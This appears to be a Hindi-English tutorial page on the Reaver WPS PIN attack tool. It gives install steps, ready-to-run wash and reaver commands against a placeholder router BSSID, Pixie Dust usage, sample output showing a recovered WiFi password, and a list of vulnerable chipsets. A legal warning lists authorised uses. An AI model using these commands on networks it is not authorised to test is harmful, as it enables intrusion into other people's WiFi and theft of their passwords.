Reaver

WPS PIN Attack Tool

🔑 Reaver क्या है?

Reaver एक powerful WPS (WiFi Protected Setup) PIN attack tool है। यह WPS PIN को brute-force करके WPA/WPA2 password recover करने के लिए design किया गया है। Reaver 8-digit PIN के सभी combinations try करता है और typically 4-10 hours में PIN crack कर लेता है।

👉 केवल WPS enabled routers पर काम करता है! अगर router में WPS disabled है, तो यह tool useless है।

🔍 Reaver क्या-क्या कर सकता है

WPS PIN Cracking

8-digit PIN brute force करना

Password Recovery

WPA/WPA2 password extract करना

WPS Detection

WPS enabled networks detect करना

Pixie Dust

Vulnerable routers पर instant crack (PixieDust)

Session Resume

Paused attack resume करना

Custom Pin List

Custom PIN lists से try करना

⚙️ Kali Linux / Termux में Reaver Install

aptInstallation Commands

System Update

apt update

Install Reaver

apt install reaver

⚠️ WPS Check Tool: wash tool भी install हो जाएगा (WPS enabled networks find करने के लिए)

💻 Basic Commands (Use)

👉 पहले WPS enabled networks find करो:

Scan for WPS enabled networks (wash)

wash -i wlan0mon

Basic Reaver attack on BSSID

reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX

Reaver with specific channel (-c)

reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -c 6

Pixie Dust attack (faster on vulnerable routers)

reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -K 1

Resume previous attack (--session)

reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX --session=myattack

Set delay between attempts (-d)

reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -d 2

🔐 Real Example: WPS PIN Attack

Step 1WPS Enabled Network Find करो
wash -i wlan0mon

👉 Output में देखो: "WPS Locked" column — अगर "No" है, तो attack possible है

Step 2Reaver Attack Start करो
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vvv

👉 -vvv flag: Verbose mode — real-time progress देखने के लिए

📊 Output समझो
[+] Pin cracked in 12345 seconds
[+] WPS PIN: 12345678
[+] WPA PSK: MyPassword123
[+] AP SSID: TargetWiFi

🧠 इसका मतलब:

PIN

WPS PIN Found

8-digit PIN successfully cracked

PSK

WPA Password

WiFi password extracted

👉 Time Estimate: 4-10 hours (average case), PixieDust से 30 seconds - 5 minutes

⚡ Pixie Dust Attack (Fast Mode)

👉 कुछ routers में WPS implementation weak होती है, उन पर Pixie Dust instant काम करता है:

reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -K 1 -vvv

👉 Vulnerable Routers (common examples):

Realtek chipsets

Very vulnerable

Broadcom (older)

Often vulnerable

Ralink/MediaTek

Sometimes vulnerable

👉 PixieDust Advantage: 30 seconds - 5 minutes में PIN crack (vs 4-10 hours brute force)

⚠️ CRITICAL LEGAL WARNING

WPS attack tools का unauthorized use criminal offense है!

🔒 Legal Use Cases:

  • अपने router की WPS vulnerability test करना
  • Authorized client networks audit करना
  • Educational labs में practice

🚫 NEVER: बिना permission किसी भी दूसरे की WiFi पर Reaver attack मत करो

🧩 Related Tools

Aircrack-ng

WPA/WPA2 handshake cracking

Wifite

Automated WPS + WPA cracking

Wash

WPS enabled networks scanner

Kismet

WiFi discovery और monitoring

💡 Simple समझ

Reaver = "WPS Lock Pick"

8-digit PIN try करके router का password unlock करता है। बस धीरे-धीरे सब combinations test करता है जब तक सही PIN न मिल जाए।